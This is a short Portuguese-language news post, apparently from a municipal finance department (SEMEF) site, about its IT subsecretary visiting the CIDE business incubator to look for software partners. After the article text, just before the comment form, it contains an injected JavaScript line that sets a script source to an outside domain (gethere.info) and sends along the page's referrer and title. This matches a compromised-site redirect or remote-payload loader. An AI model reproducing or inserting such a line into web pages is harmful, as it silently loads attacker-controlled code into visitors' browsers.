SEMEF procura no CIDE possíveis parcerias

semefnoticia

Com o objetivo de fazer parcerias na área de Tecnologia e Sistemas Informatizados, o subsecretário de Tecnologia da Informação da Secretaria Municipal de Finanças (SEMEF), Eudo Assis, esteve no Centro de Incubação e Desenvolvimento Empresarial (CIDE) para conhecer os trabalhos das empresas de base tecnológica que estão instaladas na incubadora.

Acompanhado do diretor executivo da instituição, José Cunha Barbosa Grosso, o subsecretário conversou com os empresários incubados. “Fizemos um levantamento na Semef e concluímos que para dar mais modernidade e segurança nos serviços da secretaria, precisamos de mais sistemas informatizados. Fizemos também, uma pesquisa que mostrou que há no mercado local, empresas capazes de atender essa demanda. Por isso, decidimos fazer uma visita ao Cide”, diz Eudo Assis.

Para o diretor executivo do CIDE, as empresas de tecnologia incubadas no Cide possuem profissionais e produtos capazes de desenvolver sistemas de informática para auxiliar as secretarias. “Ficamos felizes com a visita do sub-secretário e esperamos que a Semef encontre nas empresas incubadas de tecnologia o sistema de informática que eles estão buscando”, conclui José Barbosa Grosso.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *